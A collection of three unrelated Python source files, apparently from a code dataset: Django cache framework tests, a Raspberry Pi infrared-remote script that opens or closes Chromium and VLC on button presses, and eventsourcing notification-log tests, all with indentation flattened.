# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
main.py
|
# ---------------------------------------------------------------------#
# Name - IR&NECDataCollect.py
# Description - Reads data from the IR sensor but uses the official NEC Protocol (command line version)
# Author - Lime Parallelogram
# Licence - Attribution Lime
# Date - 06/07/19 - 18/08/19
# ---------------------------------------------------------------------#
# Imports modules
import os
import threading
# ==================#
# Promps for values
# Input pin
import gpio
PIN_IN = 11
class KeyConfig:
def __init__(self, file_name: str):
self.file_name = file_name
file_out = open(file_name, 'a')
file_out.close()
self.code_to_name = self.__read_all__()
def write_key(self, key_code, key_name):
output = open(self.file_name, 'a')
output.write("{0}={1}\n".format(key_code, key_name))
output.close()
self.code_to_name[key_code] = key_name
def __read_all__(self):
file_in = open(self.file_name, 'r')
lines = file_in.readlines()
hex_keys = {}
for line in lines:
if line.replace(" ", "").__len__() == 0:
continue
keys = line.split("=")
if len(keys) < 2:
continue
hex_keys[keys[0].strip()] = keys[1].strip()
file_in.close()
return hex_keys
def print(self):
config = self.code_to_name
for key in config:
print("key {0} -> {1}".format(key, config[key]))
key_config = KeyConfig("config.cnf")
is_develop = False
if is_develop:
remote = gpio.SimulateIRRemote(port_number=PIN_IN)
else:
remote = gpio.RaspIRRemote(port_number=PIN_IN)
def training():
while True:
if input("Press enter to start. Type q to quit. ") == 'q':
break
key_hex = remote.waiting_for_key_pressed()
button_name = input("Enter a name for this button: ")
key_config.write_key(key_hex, button_name)
def on_key_event(key_code):
if not key_config.code_to_name.__contains__(key_code):
print("Not found key {0}".format(key_code))
return
key_name = key_config.code_to_name[key_code]
print("You're press {0} = key {1}".format(key_code, key_name))
event = {
"top": lambda: os.system("nohup /usr/bin/chromium-browser www.google.com >/dev/null &"),
"bottom": lambda: os.system("ps ax | grep chromium-browser | awk '{print $1}' | xargs kill"),
"left": lambda: os.system("nohup vlc /media/pi/MyStorage/Videos/i-bet-you-think-about-me.mp4 >/dev/null &"),
"right": lambda: os.system("ps ax | grep vlc | awk '{print $1}' | xargs kill")
}
if event.__contains__(key_name):
threading.Thread(target=lambda: event[key_name]()).start()
if __name__ == "__main__":
options = input("Options:\t\n"
"1. Training\n"
"2. Listen\n"
"3. Exit\n"
"4. Show config\n"
"Press here: ")
action = {
"1": lambda: training(),
"2": lambda: remote.start_listen_key_press(on_key_event=on_key_event),
"3": lambda: exit(0),
"4": key_config.print
}
try:
action[options]()
except Exception as e:
print("Error {0}".format(e))
finally:
remote.release()
exit(0)
|
test_notificationlog.py
|
from math import ceil
from threading import Thread
from uuid import uuid4
from eventsourcing.application.notificationlog import (
BigArrayNotificationLog,
NotificationLogReader,
RecordManagerNotificationLog,
)
from eventsourcing.domain.model.events import DomainEvent
from eventsourcing.infrastructure.repositories.array import BigArrayRepository
from eventsourcing.interface.notificationlog import (
NotificationLogView,
RemoteNotificationLog,
)
from eventsourcing.tests.sequenced_item_tests.base import WithEventPersistence
from eventsourcing.tests.sequenced_item_tests.test_cassandra_record_manager import (
WithCassandraRecordManagers,
)
from eventsourcing.tests.sequenced_item_tests.test_django_record_manager import (
DjangoTestCase,
)
from eventsourcing.tests.sequenced_item_tests.test_sqlalchemy_record_manager import (
SQLAlchemyRecordManagerTestCase,
)
from eventsourcing.utils.topic import get_topic
from eventsourcing.utils.transcoding import ObjectJSONEncoder
class NotificationLogTestCase(SQLAlchemyRecordManagerTestCase, WithEventPersistence):
def assert_section(
self,
repo,
requested_id,
expected_id,
expected_len_items,
expected_previous_id,
expected_next_id,
):
section = repo[requested_id]
self.assertEqual(expected_len_items, len(list(section.items)))
self.assertEqual(expected_id, section.section_id)
self.assertEqual(expected_previous_id, section.previous_id)
self.assertEqual(expected_next_id, section.next_id)
def append_notifications(self, *range_args):
for i in range(*range_args):
item = ("item{}".format(i + 1)).encode("utf8")
self.append_notification(item)
def create_notification_log(self, section_size):
return RecordManagerNotificationLog(self.entity_record_manager, section_size)
def construct_entity_record_manager(self):
return self.factory.construct_integer_sequenced_record_manager()
def append_notification(self, item):
sequenced_item = self.entity_record_manager.sequenced_item_class(
uuid4(), 0, get_topic(DomainEvent), item
)
self.entity_record_manager.record_item(sequenced_item)
class TestNotificationLog(NotificationLogTestCase):
def test(self):
# Build notification log.
section_size = 5
notification_log = self.create_notification_log(section_size=section_size)
# Check the sections.
section = notification_log["current"]
self.assertEqual("1,5", section.section_id)
self.assertEqual(0, len(list(section.items)))
self.assertIsNone(section.previous_id)
self.assertIsNone(section.previous_id)
# Append notifications.
self.append_notifications(13)
# Check the sections.
self.assert_section(notification_log, "current", "11,15", 3, "6,10", None)
self.assert_section(notification_log, "1,5", "1,5", section_size, None, "6,10")
self.assert_section(
notification_log, "6,10", "6,10", section_size, "1,5", "11,15"
)
self.assert_section(notification_log, "11,15", "11,15", 3, "6,10", None)
self.assert_section(notification_log, "16,20", "16,20", 0, "11,15", None)
self.assert_section(notification_log, "21,25", "21,25", 0, "16,20", None)
# Add some more notification.
self.append_notifications(13, 24)
# Check the notification log has been extended.
self.assertEqual(len(list(notification_log["11,15"].items)), section_size)
self.assertEqual(len(list(notification_log["16,20"].items)), section_size)
self.assertEqual(len(list(notification_log["21,25"].items)), 4)
self.assertEqual(len(list(notification_log["26,30"].items)), 0)
# Check an section ID that can't be split by ',' results in a ValueError.
with self.assertRaises(ValueError):
_ = notification_log["invalid"]
class TestBigArrayNotificationLog(TestNotificationLog):
def test(self):
self.section_size = 5
super(TestBigArrayNotificationLog, self).test()
# Check array size must be divisible by section size.
with self.assertRaises(ValueError):
BigArrayNotificationLog(self.big_array, section_size=6)
# # Check the section ID must match the section size.
# notification_log = BigArrayNotificationLog(self.big_array, self.section_size)
# with self.assertRaises(ValueError):
# _ = notification_log['1,2']
# # Check the section ID must be aligned to the array size.
# with self.assertRaises(ValueError):
# _ = notification_log['2,6']
def create_notification_log(self, section_size):
self.big_array = self.create_big_array()
return BigArrayNotificationLog(self.big_array, section_size=section_size)
def create_big_array(self, big_array_id=None):
big_array_id = uuid4() if big_array_id is None else big_array_id
big_array_repo = BigArrayRepository(event_store=self.entity_event_store)
big_array = big_array_repo[big_array_id]
return big_array
def append_notification(self, item):
self.big_array.append(item)
class TestNotificationLogReader(NotificationLogTestCase):
def test(self):
# Build notification log.
section_size = 5
notification_log = self.create_notification_log(section_size=section_size)
# Append 13 notifications.
self.append_notifications(13)
# Construct notification log reader.
reader = NotificationLogReader(notification_log)
# Check position.
self.assertEqual(reader.position, 0)
# Read all notifications.
all_notifications = list(reader)
self.assertEqual(13, len(all_notifications))
# Check position.
self.assertEqual(reader.position, 13)
# Add some more items to the log.
self.append_notifications(13, 21)
# Read subsequent notifications.
subsequent_notifications_notifications = list(reader)
self.assertEqual(len(subsequent_notifications_notifications), 8)
# Check position.
self.assertEqual(reader.position, 21)
subsequent_notifications_notifications = list(reader)
self.assertEqual(len(subsequent_notifications_notifications), 0)
# Set position.
reader.seek(13)
subsequent_notifications_notifications = list(reader)
self.assertEqual(len(subsequent_notifications_notifications), 8)
# # Read items after a particular position.
self.assertEqual(len(list(reader[0:])), 21)
self.assertEqual(len(list(reader[1:])), 20)
self.assertEqual(len(list(reader[2:])), 19)
self.assertEqual(len(list(reader[3:])), 18)
self.assertEqual(len(list(reader[13:])), 8)
self.assertEqual(len(list(reader[18:])), 3)
self.assertEqual(len(list(reader[19:])), 2)
self.assertEqual(len(list(reader[20:])), 1)
self.assertEqual(len(list(reader[21:])), 0)
# Check last item numbers less than 1 cause a value errors.
with self.assertRaises(ValueError):
reader.position = -1
list(reader)
with self.assertRaises(ValueError):
list(reader.seek(-1))
# Resume from a saved position.
saved_position = 5
advance_by = 3
reader.seek(saved_position)
self.assertEqual(reader.position, saved_position)
reader.list_notifications(advance_by=advance_by)
self.assertEqual(reader.position, saved_position + advance_by)
# Read items between particular positions.
# - check stops at end of slice, and position tracks ok
self.assertEqual(reader[0]["id"], 1)
self.assertEqual(reader.position, 1)
self.assertEqual(next(reader)["id"], 2)
self.assertEqual(reader.position, 2)
reader.seek(5)
self.assertEqual(next(reader)["id"], 6)
self.assertEqual(reader.position, 6)
reader.seek(0)
list(reader)
self.assertEqual(reader.position, 21)
self.assertEqual(len(list(reader[0:1])), 1)
self.assertEqual(reader.position, 1)
self.assertEqual(len(list(reader[1:3])), 2)
self.assertEqual(reader.position, 3)
self.assertEqual(len(list(reader[2:5])), 3)
self.assertEqual(reader.position, 5)
self.assertEqual(len(list(reader[3:7])), 4)
self.assertEqual(reader.position, 7)
self.assertEqual(len(list(reader[13:20])), 7)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[18:20])), 2)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[19:20])), 1)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[20:20])), 0)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[21:20])), 0)
self.assertEqual(reader.position, 21)
